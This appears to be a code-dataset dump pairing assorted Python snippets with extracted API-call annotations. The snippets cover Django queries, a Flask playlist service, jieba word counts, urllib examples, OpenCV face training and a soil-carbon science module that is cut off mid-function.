code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
from django.db.models import Max, Avg, Sum, F
from labs.common.models import Registration
def highest_discount(event_id=1):
"""
>>> SELECT MAX(registration.discount) AS max_discount FROM registration
WHERE registration.event_id = event_id
"""
registrations = Registration.objects.filter(event_id=event_id)
max_dicount = registrations.aggregate(max_discount=Max('discount'))
print(max_dicount)
def total_sold_tickets(event_id=1):
"""
>>> SELECT SUM(registration.ticket) AS total_ticket FROM registration
WHERE registration.event_id = event_id
"""
registrations = Registration.objects.filter(event_id=event_id)
max_dicount = registrations.aggregate(total_ticket=Sum('ticket'))
print(max_dicount)
def average_tickets_per_registration():
"""
>>> SELECT AVG(registration.ticket) AS avg_ticket FROM registration
"""
avg_ticket = Registration.objects.aggregate(avg_ticket=Avg('ticket'))
print(avg_ticket)
def registration_tickets_price():
"""
>>> SELECT ..., (registration.ticket * ((100 - registration.discount) * event.ticket_price) / 100) AS price
FROM registration INNER JOIN event ON (registration.event_id = event.id)
INNER JOIN member ON (registration.member_id = member.id)
"""
tickets_price = F('ticket') * (100 - F('discount')) * F('event__ticket_price') / 100
registration_list = Registration.objects.annotate(
price=tickets_price).select_related()
for r in registration_list:
print("{0} pays {1} for {2} tickt(s) with {3}% discount".format(
r.member, r.price, r.ticket, r.discount))
def event_income():
"""
>>> SELECT event.name, SUM((((registration.ticket * (100 - registration.discount)) * event.ticket_price) / 100)) AS price
FROM registration INNER JOIN event ON (registration.event_id = event.id) GROUP BY event.name
"""
tickets_price = F('ticket') * (100 - F('discount')) * F('event__ticket_price') / 100
registration_list = Registration.objects.values('event__name')
# ==> group by event
events_income = registration_list.annotate(income=Sum(tickets_price))
for e in events_income:
print("{event__name} reaches {income}$ as an income".format(**e))
|
[
"django.db.models.Max",
"labs.common.models.Registration.objects.annotate",
"django.db.models.Sum",
"labs.common.models.Registration.objects.filter",
"django.db.models.F",
"django.db.models.Avg",
"labs.common.models.Registration.objects.values"
] |
[((286, 332), 'labs.common.models.Registration.objects.filter', 'Registration.objects.filter', ([], {'event_id': 'event_id'}), '(event_id=event_id)\n', (313, 332), False, 'from labs.common.models import Registration\n'), ((623, 669), 'labs.common.models.Registration.objects.filter', 'Registration.objects.filter', ([], {'event_id': 'event_id'}), '(event_id=event_id)\n', (650, 669), False, 'from labs.common.models import Registration\n'), ((2029, 2071), 'labs.common.models.Registration.objects.values', 'Registration.objects.values', (['"""event__name"""'], {}), "('event__name')\n", (2056, 2071), False, 'from labs.common.models import Registration\n'), ((388, 403), 'django.db.models.Max', 'Max', (['"""discount"""'], {}), "('discount')\n", (391, 403), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((725, 738), 'django.db.models.Sum', 'Sum', (['"""ticket"""'], {}), "('ticket')\n", (728, 738), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((952, 965), 'django.db.models.Avg', 'Avg', (['"""ticket"""'], {}), "('ticket')\n", (955, 965), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1360, 1384), 'django.db.models.F', 'F', (['"""event__ticket_price"""'], {}), "('event__ticket_price')\n", (1361, 1384), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1415, 1465), 'labs.common.models.Registration.objects.annotate', 'Registration.objects.annotate', ([], {'price': 'tickets_price'}), '(price=tickets_price)\n', (1444, 1465), False, 'from labs.common.models import Registration\n'), ((1974, 1998), 'django.db.models.F', 'F', (['"""event__ticket_price"""'], {}), "('event__ticket_price')\n", (1975, 1998), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((2152, 2170), 'django.db.models.Sum', 'Sum', (['tickets_price'], {}), '(tickets_price)\n', (2155, 2170), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1322, 1333), 'django.db.models.F', 'F', (['"""ticket"""'], {}), "('ticket')\n", (1323, 1333), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1936, 1947), 'django.db.models.F', 'F', (['"""ticket"""'], {}), "('ticket')\n", (1937, 1947), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1343, 1356), 'django.db.models.F', 'F', (['"""discount"""'], {}), "('discount')\n", (1344, 1356), False, 'from django.db.models import Max, Avg, Sum, F\n'), ((1957, 1970), 'django.db.models.F', 'F', (['"""discount"""'], {}), "('discount')\n", (1958, 1970), False, 'from django.db.models import Max, Avg, Sum, F\n')]
|
from flask import Flask, request, json
from playlist_compare import playlistService, helloService, searchService
app = Flask(__name__)
@app.route("/")
def helloRoute():
data = helloService.hello()
return json.jsonify(data)
@app.route("/list")
def listAll():
token = request.args.get("token")
username = request.args.get("username")
data = playlistService.getAll(token, username)
return json.jsonify(data)
@app.route("/listOne")
def listOne():
token = request.args.get("token")
username = request.args.get("username")
playlist = request.args.get("playlist")
data = playlistService.getTracks(token, username, playlist)
return json.jsonify(data)
@app.route("/listDuplicates")
def listDuplicates():
token = request.args.get("token")
username = request.args.get("username")
data = playlistService.getDuplicates(token, username)
return json.jsonify(data)
@app.route("/search")
def searchRoute():
data = searchService.search()
return json.jsonify(data)
|
[
"playlist_compare.helloService.hello",
"flask.request.args.get",
"flask.Flask",
"flask.json.jsonify",
"playlist_compare.searchService.search",
"playlist_compare.playlistService.getAll",
"playlist_compare.playlistService.getDuplicates",
"playlist_compare.playlistService.getTracks"
] |
[((121, 136), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (126, 136), False, 'from flask import Flask, request, json\n'), ((184, 204), 'playlist_compare.helloService.hello', 'helloService.hello', ([], {}), '()\n', (202, 204), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((216, 234), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), '(data)\n', (228, 234), False, 'from flask import Flask, request, json\n'), ((284, 309), 'flask.request.args.get', 'request.args.get', (['"""token"""'], {}), "('token')\n", (300, 309), False, 'from flask import Flask, request, json\n'), ((325, 353), 'flask.request.args.get', 'request.args.get', (['"""username"""'], {}), "('username')\n", (341, 353), False, 'from flask import Flask, request, json\n'), ((366, 405), 'playlist_compare.playlistService.getAll', 'playlistService.getAll', (['token', 'username'], {}), '(token, username)\n', (388, 405), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((417, 435), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), '(data)\n', (429, 435), False, 'from flask import Flask, request, json\n'), ((488, 513), 'flask.request.args.get', 'request.args.get', (['"""token"""'], {}), "('token')\n", (504, 513), False, 'from flask import Flask, request, json\n'), ((529, 557), 'flask.request.args.get', 'request.args.get', (['"""username"""'], {}), "('username')\n", (545, 557), False, 'from flask import Flask, request, json\n'), ((573, 601), 'flask.request.args.get', 'request.args.get', (['"""playlist"""'], {}), "('playlist')\n", (589, 601), False, 'from flask import Flask, request, json\n'), ((614, 666), 'playlist_compare.playlistService.getTracks', 'playlistService.getTracks', (['token', 'username', 'playlist'], {}), '(token, username, playlist)\n', (639, 666), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((678, 696), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), '(data)\n', (690, 696), False, 'from flask import Flask, request, json\n'), ((763, 788), 'flask.request.args.get', 'request.args.get', (['"""token"""'], {}), "('token')\n", (779, 788), False, 'from flask import Flask, request, json\n'), ((804, 832), 'flask.request.args.get', 'request.args.get', (['"""username"""'], {}), "('username')\n", (820, 832), False, 'from flask import Flask, request, json\n'), ((845, 891), 'playlist_compare.playlistService.getDuplicates', 'playlistService.getDuplicates', (['token', 'username'], {}), '(token, username)\n', (874, 891), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((903, 921), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), '(data)\n', (915, 921), False, 'from flask import Flask, request, json\n'), ((976, 998), 'playlist_compare.searchService.search', 'searchService.search', ([], {}), '()\n', (996, 998), False, 'from playlist_compare import playlistService, helloService, searchService\n'), ((1010, 1028), 'flask.json.jsonify', 'json.jsonify', (['data'], {}), '(data)\n', (1022, 1028), False, 'from flask import Flask, request, json\n')]
|
import numpy as np
import torch
def person_embed(speaker_ids, person_vec):
'''
:param speaker_ids: torch.Tensor ( T, B)
:param person_vec: numpy array (num_speakers, 100)
:return:
speaker_vec: torch.Tensor (T, B, D)
'''
speaker_vec = []
for t in speaker_ids:
speaker_vec.append([person_vec[int(i)].tolist() if i != -1 else [0] * 100 for i in t])
speaker_vec = torch.FloatTensor(speaker_vec)
return speaker_vec
|
[
"torch.FloatTensor"
] |
[((410, 440), 'torch.FloatTensor', 'torch.FloatTensor', (['speaker_vec'], {}), '(speaker_vec)\n', (427, 440), False, 'import torch\n')]
|
# Generated by Django 2.1.4 on 2019-01-03 23:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('seimas', '0030_auto_20190103_2234'),
]
operations = [
migrations.AlterField(
model_name='committee',
name='slug',
field=models.SlugField(unique=True),
),
migrations.AlterField(
model_name='fraction',
name='slug',
field=models.SlugField(unique=True),
),
]
|
[
"django.db.models.SlugField"
] |
[((336, 365), 'django.db.models.SlugField', 'models.SlugField', ([], {'unique': '(True)'}), '(unique=True)\n', (352, 365), False, 'from django.db import migrations, models\n'), ((487, 516), 'django.db.models.SlugField', 'models.SlugField', ([], {'unique': '(True)'}), '(unique=True)\n', (503, 516), False, 'from django.db import migrations, models\n')]
|
import jieba #分词库
import jieba.analyse
import pymongo
import redis
import os
import re
import json
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['job']
collection = db['position']
data = collection.find({})
text = ""
for item in data:
text += item['body']
pwd = os.path.split(os.path.realpath(__file__))[0]
stopWord = pwd+'/stop.txt'
jieba.analyse.set_stop_words(stopWord)
cut_text= jieba.cut(text)
it_text = dict({})
for x in cut_text:
G = re.match('[a-zA-Z]+',x)
if G:
key = G.group()
keys = map(lambda x: x.lower(), it_text.keys())
if key.lower() in keys:
it_text[key.lower()] += 1
else:
it_text[key.lower()] = 1
with open("word.json","w+",encoding="utf-8") as file:
data = file.write(json.dumps((it_text)))
result= "/".join(cut_text)#必须给个符号分隔开分词结果来形成字符串,否则不能绘制词云
data = jieba.analyse.extract_tags(result.replace('/',''), withWeight=False, allowPOS=())
#print(",".join(data))
|
[
"pymongo.MongoClient",
"jieba.cut",
"os.path.realpath",
"re.match",
"json.dumps",
"jieba.analyse.set_stop_words"
] |
[((125, 174), 'pymongo.MongoClient', 'pymongo.MongoClient', ([], {'host': '"""127.0.0.1"""', 'port': '(27017)'}), "(host='127.0.0.1', port=27017)\n", (144, 174), False, 'import pymongo\n'), ((382, 420), 'jieba.analyse.set_stop_words', 'jieba.analyse.set_stop_words', (['stopWord'], {}), '(stopWord)\n', (410, 420), False, 'import jieba\n'), ((431, 446), 'jieba.cut', 'jieba.cut', (['text'], {}), '(text)\n', (440, 446), False, 'import jieba\n'), ((494, 518), 're.match', 're.match', (['"""[a-zA-Z]+"""', 'x'], {}), "('[a-zA-Z]+', x)\n", (502, 518), False, 'import re\n'), ((324, 350), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (340, 350), False, 'import os\n'), ((806, 825), 'json.dumps', 'json.dumps', (['it_text'], {}), '(it_text)\n', (816, 825), False, 'import json\n')]
|
from urllib.parse import urlencode, urldefrag, quote, unquote
import requests
# from requests.urllib3 import urlretrieve
import urllib
from urllib.request import urlretrieve
mydict = {
"Name": "<NAME>",
"address": "test address",
"fav char": "<NAME>"
}
strUrl = urlencode(mydict)
print(strUrl)
string = urlencode({"v": "what is your favroute editor, VS Code, atom , sublime"})
print(string)
sdecode = urldefrag(string)
print(sdecode)
qt = quote('Famous Quote:"I think, there I am')
print(qt)
print(unquote(qt))
fd = urllib.request.urlopen("ftp://ftp.oreilly.com")
print(fd.read())
fd.close()
ob = urlretrieve("ftp://ftp.oreilly.com", "menu.txt")
print(ob)
"""
retrieve.py example
"""
def callback(blocknum, blocksize, totalsize):
print("Downloaded " + str((blocknum * blocksize)))
print(" of ", totalsize)
urlretrieve("http://www.example.com/pyxml.xml", "px.xml", callback)
print("Download Complete")
|
[
"urllib.parse.unquote",
"urllib.parse.urldefrag",
"urllib.parse.urlencode",
"urllib.request.urlopen",
"urllib.request.urlretrieve",
"urllib.parse.quote"
] |
[((279, 296), 'urllib.parse.urlencode', 'urlencode', (['mydict'], {}), '(mydict)\n', (288, 296), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n'), ((321, 394), 'urllib.parse.urlencode', 'urlencode', (["{'v': 'what is your favroute editor, VS Code, atom , sublime'}"], {}), "({'v': 'what is your favroute editor, VS Code, atom , sublime'})\n", (330, 394), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n'), ((420, 437), 'urllib.parse.urldefrag', 'urldefrag', (['string'], {}), '(string)\n', (429, 437), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n'), ((459, 501), 'urllib.parse.quote', 'quote', (['"""Famous Quote:"I think, there I am"""'], {}), '(\'Famous Quote:"I think, there I am\')\n', (464, 501), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n'), ((539, 586), 'urllib.request.urlopen', 'urllib.request.urlopen', (['"""ftp://ftp.oreilly.com"""'], {}), "('ftp://ftp.oreilly.com')\n", (561, 586), False, 'import urllib\n'), ((622, 670), 'urllib.request.urlretrieve', 'urlretrieve', (['"""ftp://ftp.oreilly.com"""', '"""menu.txt"""'], {}), "('ftp://ftp.oreilly.com', 'menu.txt')\n", (633, 670), False, 'from urllib.request import urlretrieve\n'), ((843, 910), 'urllib.request.urlretrieve', 'urlretrieve', (['"""http://www.example.com/pyxml.xml"""', '"""px.xml"""', 'callback'], {}), "('http://www.example.com/pyxml.xml', 'px.xml', callback)\n", (854, 910), False, 'from urllib.request import urlretrieve\n'), ((519, 530), 'urllib.parse.unquote', 'unquote', (['qt'], {}), '(qt)\n', (526, 530), False, 'from urllib.parse import urlencode, urldefrag, quote, unquote\n')]
|
import decimal
import json
import typing
from datetime import datetime
import baseline_cloud.core.date
from baseline_cloud import core
class JSONEncoder(json.JSONEncoder):
def default(self, o: typing.Any) -> typing.Any:
if isinstance(o, datetime):
return core.date.format_utc(o)
if isinstance(o, decimal.Decimal):
return float(o)
return super(JSONEncoder, self).default(o)
|
[
"baseline_cloud.core.date.format_utc"
] |
[((282, 305), 'baseline_cloud.core.date.format_utc', 'core.date.format_utc', (['o'], {}), '(o)\n', (302, 305), False, 'from baseline_cloud import core\n')]
|
import os, sys
import json
from collections import defaultdict
import numpy as np
import pandas as pd
dna_pair = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}
amino_acid_index_table = {
'A': 0,
'B': 20,
'C': 1,
'D': 2,
'E': 3,
'F': 4,
'G': 5,
'H': 6,
'I': 7,
'J': 20,
'K': 8,
'L': 9,
'M': 10,
'N': 11,
'O': 20,
'P': 12,
'Q': 13,
'R': 14,
'S': 15,
'T': 16,
'U': 20,
'V': 17,
'W': 18,
'X': 20,
'Y': 19,
'Z': 20,
}
ss3_encode = {'H': 0, 'E': 1, 'C': 2}
ss8_encode = {'H': 0, 'G': 1, 'I': 2, 'B': 3, 'E': 4, 'S': 5, 'T': 6, 'C': 7}
ss8_ss3_encode = {
'H': 0,
'G': 0,
'I': 0,
'B': 1,
'E': 1,
'S': 2,
'T': 2,
'C': 2
}
def read_fasta(fasta_path, name_rule=None):
fasta = defaultdict(str)
seq = ""
print(fasta_path)
with open(fasta_path) as f:
for line in f:
print(line)
if len(line.strip()) == 0:
continue
if line.startswith('>'):
print(line)
if seq != '':
fasta[head] = seq
seq = ''
if name_rule is None:
head = line.strip().split()[0][1:]
else:
head = name_rule(line)
else:
seq += line.strip()
if seq != "":
fasta[head] = seq
return fasta
def aa_index(aa):
return amino_acid_index_table.get(aa, 20)
def get_complement_dna(dna):
return ''.join([dna_pair.get(a, '-') for a in dna.strip()])
#reverse strand
def get_reverse_dna(dna):
r = ''.join([dna_pair[a] for a in dna])
return r[::-1]
def read_vep(input_path, read_id=True):
head = [
'grch38_chrom', 'gch38_pos', 'ref', 'alt', 'ref_codon', 'alt_codon',
'frame', 'transcript_stable_id', 'protein_len', 'aa_pos', 'ref_aa',
'alt_aa'
]
skiprows = 0
with open(input_path) as f:
for line in f:
if not line.startswith('## '):
break
skiprows += 1
df = pd.read_csv(input_path, sep='\t', skiprows=skiprows)
#filters
df = df[df['CANONICAL'] == 'YES']
if 'VARIANT_CLASS' in df.columns:
df = df[df['VARIANT_CLASS'] == 'SNV']
df = df[df['Consequence'].apply(lambda x: 'missense_variant' in x)]
if read_id:
df['label'] = df['#Uploaded_variation'].apply(
lambda x: int(x.split('|')[-1]))
df['source'] = df['#Uploaded_variation'].apply(
lambda x: x.split('|')[2])
else:
df['label'] = -1
df['source'] = 'unknown'
df['transcript_stable_id'] = df['Feature'].apply(lambda x: x.split('.')[0])
df = df[df['transcript_stable_id'].apply(lambda x: x in used_tr)]
df['protein_var'] = df.apply(_get_protein_var, axis=1)
df['var'] = df.apply(_get_var, axis=1)
def _get_af(x):
if type(x) == str and x == '-':
return 0.0
return float(x)
df['af'] = df['gnomAD_AF'].apply(_get_af)
def _get_frame(x):
r = 0
for a in x:
if a.isupper():
return r
r += 1
assert 1 == 2
return 0
df['frame'] = df['Codons'].apply(_get_frame)
df = df.drop_duplicates(['var'])
df = df[head]
return df
def parse_uniprot_isoform():
pass
|
[
"collections.defaultdict",
"pandas.read_csv"
] |
[((804, 820), 'collections.defaultdict', 'defaultdict', (['str'], {}), '(str)\n', (815, 820), False, 'from collections import defaultdict\n'), ((2114, 2166), 'pandas.read_csv', 'pd.read_csv', (['input_path'], {'sep': '"""\t"""', 'skiprows': 'skiprows'}), "(input_path, sep='\\t', skiprows=skiprows)\n", (2125, 2166), True, 'import pandas as pd\n')]
|
import os
import cv2
from matplotlib.pyplot import gray
import numpy as np
people = ['<NAME>', '<NAME>', '<NAME>', 'Madonna', '<NAME>']
DIR = r'/home/senai/tiago-projects/opencv-course/Resources/Faces/train'
haar_cascade = cv2.CascadeClassifier('/home/senai/tiago-projects/opencv-course/face_detection/haar_face.xml')
features = []
labels = []
def create_train():
for person in people:
path = os.path.join(DIR, person)
label = people.index(person)
for img in os.listdir(path):
img_path = os.path.join(path, img)
img_array = cv2.imread(img_path)
gray = cv2.cvtColor(img_array, cv2.COLOR_BGR2GRAY)
faces_rect = haar_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=4)
for(x,y,w,h) in faces_rect:
faces_roi = gray[y:y+h, x:x+w]
features.append(faces_roi)
labels.append(label)
create_train()
features = np.array(features)
labels = np.array(labels)
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
# Train the recognizer on the features list and the labels list
face_recognizer.train(features, labels)
face_recognizer.save('face_trained.yml')
np.save('features.npy', features)
np.save('labels.npy', labels)
|
[
"numpy.save",
"cv2.face.LBPHFaceRecognizer_create",
"cv2.cvtColor",
"cv2.imread",
"numpy.array",
"cv2.CascadeClassifier",
"os.path.join",
"os.listdir"
] |
[((224, 323), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""/home/senai/tiago-projects/opencv-course/face_detection/haar_face.xml"""'], {}), "(\n '/home/senai/tiago-projects/opencv-course/face_detection/haar_face.xml')\n", (245, 323), False, 'import cv2\n'), ((956, 974), 'numpy.array', 'np.array', (['features'], {}), '(features)\n', (964, 974), True, 'import numpy as np\n'), ((985, 1001), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (993, 1001), True, 'import numpy as np\n'), ((1021, 1057), 'cv2.face.LBPHFaceRecognizer_create', 'cv2.face.LBPHFaceRecognizer_create', ([], {}), '()\n', (1055, 1057), False, 'import cv2\n'), ((1205, 1238), 'numpy.save', 'np.save', (['"""features.npy"""', 'features'], {}), "('features.npy', features)\n", (1212, 1238), True, 'import numpy as np\n'), ((1239, 1268), 'numpy.save', 'np.save', (['"""labels.npy"""', 'labels'], {}), "('labels.npy', labels)\n", (1246, 1268), True, 'import numpy as np\n'), ((408, 433), 'os.path.join', 'os.path.join', (['DIR', 'person'], {}), '(DIR, person)\n', (420, 433), False, 'import os\n'), ((491, 507), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (501, 507), False, 'import os\n'), ((532, 555), 'os.path.join', 'os.path.join', (['path', 'img'], {}), '(path, img)\n', (544, 555), False, 'import os\n'), ((581, 601), 'cv2.imread', 'cv2.imread', (['img_path'], {}), '(img_path)\n', (591, 601), False, 'import cv2\n'), ((621, 664), 'cv2.cvtColor', 'cv2.cvtColor', (['img_array', 'cv2.COLOR_BGR2GRAY'], {}), '(img_array, cv2.COLOR_BGR2GRAY)\n', (633, 664), False, 'import cv2\n')]
|
'''
Specialized scientific functions for biogeophysical variables and L4C model
processes.
'''
import numpy as np
from functools import partial
from scipy.ndimage import generic_filter
from scipy.linalg import solve_banded
from scipy.sparse import dia_matrix
from pyl4c import suppress_warnings
from pyl4c.data.fixtures import HDF_PATHS, BPLUT
from pyl4c.utils import get_pft_array, subset
from pyl4c.stats import ols, ols_variance, linear_constraint
def arrhenius(
tsoil, beta0: float, beta1: float = 66.02, beta2: float = 227.13):
r'''
The Arrhenius equation for response of enzymes to (soil) temperature,
constrained to lie on the closed interval [0, 1].
$$
f(T_{SOIL}) = \mathrm{exp}\left[\beta_0\left( \frac{1}{\beta_1} -
\frac{1}{T_{SOIL} - \beta_2} \right) \right]
$$
Parameters
----------
tsoil : numpy.ndarray
Array of soil temperature in degrees K
beta0 : float
Coefficient for soil temperature (deg K)
beta1 : float
Coefficient for ... (deg K)
beta2 : float
Coefficient for ... (deg K)
Returns
-------
numpy.ndarray
Array of soil temperatures mapped through the Arrhenius function
'''
a = (1.0 / beta1)
b = np.divide(1.0, np.subtract(tsoil, beta2))
# This is the simple answer, but it takes on values >1
y0 = np.exp(np.multiply(beta0, np.subtract(a, b)))
# Constrain the output to the interval [0, 1]
return np.where(y0 > 1, 1, np.where(y0 < 0, 0, y0))
def bias_correction_parameters(
series, npoly: int = 1, cutoff: float = 1, var_cutoff: float = None,
add_intercept: bool = True):
'''
Calculate the bias correction parameters for two overlapping time series,
nominally the Nature Run and L4C Operational products, of a given
variable using quantile mapping. For example, can correct the bias in
Nature Run (2000-2017) against the L4C Ops record (2015-Present) by
fitting bias correction parameters for the overlap period 2015-2017.
Model can be specified:
y = alpha + X beta_0 + X^2 beta_1 + ...
NOTE: Because Nature Run and L4C Ops compare very well in some locations,
a degree-1 polynomial (straight line) is fit first (regardless of npoly);
if this solution produces corrections that are <1 gC m^-2, the degree-1
solution is used. In some areas, there is a strong linear correspondence
between most measurements but a small number have a super-linear
relationship that is poorly fit by a degree-2 polynomial; in these cases
(where model variance of the degree-2 fit is > var_cutoff), the degree-1
solution is used. Forcing the line of best fit through the origin (with
intercept=False) is also not recommended.
Parameters
----------
series : numpy.ndarray
A (t x 2) NumPy array where t rows correspond to t time steps and
each column is a product; the first column is the reference product
or dependent variable in the linear bias correction.
npoly : int
Degree of the polynomial to use in bias correction (Default: 1)
cutoff : float
Cutoff for the degree-1 bias correction, in data units (e.g.,
1 g C m-2 day-1); defaults to 1.0, i.e., the residual after correction
must be greater than 1 g C m-2 day-1, which is the average impact of
L4SM versus model-only observations. If this cutoff is exceeded, the
degree-1 solution is returned.
var_cutoff : float or None
Cutoff in variance for higher-order solutions; if the residual model
variance exceeds this threshold for the degree-N solution, then return
the degree (N-1) solution (Default: None)
add_intercept : bool
True to add a the y-intercept term (Default: True)
Returns
-------
numpy.ndarray
A vector of length N + 1 where N is the degree of the polynomial
fit requested
'''
def xmat(x, npoly):
# Creates the design/ model matrix for a polynomial series
# Add a column for each power of the requested polynomial series
x = np.repeat(x.reshape((t, 1)), npoly, axis = 1)
for i in range(1, npoly):
# Calculate X^n for n up to N powers
x[:,i] = np.power(x[:,0], npoly + 1)
return x
def fit(x, y, npoly):
# Fits the model using OLS
# If all of the Y values are NaN
if np.all(np.isnan(y)): return np.ones((npoly + 1,)) * np.nan
try:
return ols(xmat(x, npoly), y, add_intercept)
except np.linalg.linalg.LinAlgError:
return np.ones((npoly + 1,)) * np.nan
# Sort the input series from low -> high
t = series.shape[0]
y = np.sort(series[:,0])
x = np.sort(series[:,1])
# For some pixels, the time series has zero variance, and this can produce
# unstable OLS estimates (e.g., zero slope)
if np.var(y) == 0 or np.var(x) == 0:
# Return coefficients: (0, 1, 0, ..., 0)
return np.hstack(((0, 1), list(0 for i in range(1, npoly))))
if np.var(y) == 0 and np.var(x) == 0:
# Intercept (mean) is the only necessary predictor
return np.hstack(((1, 0), list(0 for i in range(1, npoly))))
fit1 = np.hstack(
(fit(x, y, npoly = 1), list(0 for i in range(1, npoly))))
if npoly == 1:
return fit1
# First, try a degree-1 polynomial (straight-line) fit; if the bias
# correction slope is such that the correction is < 1 gC/m^-2,
# which is similar to the average impact of L4SM vs. model-only
# observations, then use the degree-1 fit parameters
if x.mean() - (fit1[1] * x.mean()) < cutoff:
return fit1
# Second, starting with the simpler model, check if progressively more
# complicated models (up to a maximum of npoly) really do fit the data
# better; if not, or if the model variance is above a cutoff, use the
# next most-complicated model (last_model)
last_model = fit1 # Starting with the simplest model...
for p in range(2, npoly + 1):
model = fit(x, y, npoly = p)
# Calculates unbiased estimate of model variance
model_var = ols_variance(xmat(x, p), y, model, add_intercept)
# Without a cutoff for guidance, if the model variance of the degree-1
# fit is lower than that of the degree-2 fit...
if var_cutoff is None:
if model_var > ols_variance(
xmat(x, 1), y, last_model[0:p], add_intercept):
return last_model
else:
if model_var > var_cutoff:
return last_model
last_model = model
# Unless a simpler model was better, return coefficients for the requested
# polynomial degree
return model
def climatology365(series, dates):
'''
Computes a 365-day climatology for different locations from a time series
of length T. Ignores leap days. The climatology could then be indexed
using ordinals generated by `ordinals365()`.
Parameters
----------
series : numpy.ndarray
T x ... array of data
dates : list or tuple
Sequence of datetime.datetime or datetime.date instances
Returns
-------
numpy.ndarray
'''
@suppress_warnings
def calc_climatology(x):
return np.array([
np.nanmean(x[ordinal == day,...], axis = 0)
for day in range(1, 366)
])
# Get first and last day of the year (DOY)
ordinal = np.array([
# Finally, subtract 1 from each day in a leap year after Leap Day
(doy - 1) if ((dates[i].year % 4 == 0) and doy >= 60) else doy
for i, doy in enumerate([
# Next, fill in 0 wherever Leap Day occurs
0 if (dates[i].year % 4 == 0 and doy == 60) else doy
for i, doy in enumerate([
# First, convert datetime.datetime to ordinal day-of-year (DOY)
int(dt.strftime('%j')) for dt in dates
])
])
])
return calc_climatology(series)
def daynight_partition(arr_24hr, updown, reducer = 'mean'):
'''
Partitions a 24-hour time series array into daytime and nighttime values,
then calculates the mean in each group. Daytime is defined as when the sun
is above the horizon; nighttime is the complement.
Parameters
----------
arr_24hr : numpy.ndarray
A size (24 x ...) array; the first axis must have 24 elements
corresponding to the measurement in each hour
updown: numpy.ndarray
A size (2 x ...) array, compatible with arr_24hr, where the first axis
has the hour of sunrise and sunset, in that order, for each element
reducer : str
One of "mean" or "sum" indicating whether an average or a total of the
daytime/ nighttime values should be calculated; e.g., for "mean", the
hourly values from daytime hours are added up and divided by the
length of the day (in hours).
Returns
-------
numpy.ndarray
A size (2 x ...) array where the first axis enumerates the daytime and
nighttime mean values, respectively
'''
assert reducer in ('mean', 'sum'),\
'Argument "reducer" must be one of: "mean", "sum"'
# Prepare single-valued output array
arr_daytime = np.zeros(arr_24hr.shape[1:])
arr_nighttime = arr_daytime.copy()
daylight_hrs = arr_daytime.copy().astype(np.int16)
# Do sunrise and sunset define an interval? (Sunset > Sunrise)?
inside_interval = np.apply_along_axis(lambda x: x[1] > x[0], 0, updown)
# Or is the sun never up?
never_up = np.logical_and(updown[0,...] == -1, updown[1,...] == -1)
# Iteratively sum daytime VPD and temperature values
for hr in range(0, 24):
# Given only hour of sunrise/set on a 24-hour clock...
# if sun rises and sets on same day: SUNRISE <= HOUR <= SUNSET;
# if sun sets on next day: either SUNRISE <= HOUR or HOUR <= SUNSET;
sun_is_up = np.logical_or( # Either...
np.logical_and(inside_interval, # ...Rises and sets same day
np.logical_and(updown[0,...] <= hr, hr <= updown[1,...])),
np.logical_and(~inside_interval, # ...Sets on next day
np.logical_or(updown[0,...] <= hr, hr <= updown[1,...])))
# For simplicity, compute a 24-hour mean even if the sun never rises;
# there's no way to know what the "correct" daytime value is
mask = np.logical_or(never_up, sun_is_up)
np.add(np.where(
mask, arr_24hr[hr,...], 0), arr_daytime, out = arr_daytime)
np.add(np.where(
~mask, arr_24hr[hr,...], 0), arr_nighttime, out = arr_nighttime)
# Keep track of the denominator (hours) for calculating the mean;
# note that this over-estimates actual daylight hours by 1 hour
# but results in the correct denominator for the sums above
np.add(np.where(mask, 1, 0), daylight_hrs, out = daylight_hrs)
arr_24hr = None
# Calculate mean quantities
if reducer == 'mean':
arr_daytime = np.divide(arr_daytime, daylight_hrs)
arr_nighttime = np.divide(arr_nighttime, 24 - daylight_hrs)
# For sites where the sun is always above/ below the horizon, set missing
# nighttime values to zero
arr_nighttime[~np.isfinite(arr_nighttime)] = 0
return np.stack((arr_daytime, arr_nighttime))
def e_mult(params, tmin, vpd, smrz, ft):
'''
Calculate environmental constraint multiplier for gross primary
productivity (GPP), E_mult, based on current model parameters. The
expected parameter names are "LUE" for the maximum light-use
efficiency; "smrz0" and "smrz1" for the lower and upper bounds on root-
zone soil moisture; "vpd0" and "vpd1" for the lower and upper bounds on
vapor pressure deficity (VPD); "tmin0" and "tmin1" for the lower and
upper bounds on minimum temperature; and "ft0" for the multiplier during
frozen ground conditions.
Parameters
----------
params : dict
A dict-like data structure with named model parameters
tmin : numpy.ndarray
(T x N) vector of minimum air temperature (deg K), where T is the
number of time steps, N the number of sites
vpd : numpy.ndarray
(T x N) vector of vapor pressure deficit (Pa), where T is the number
of time steps, N the number of sites
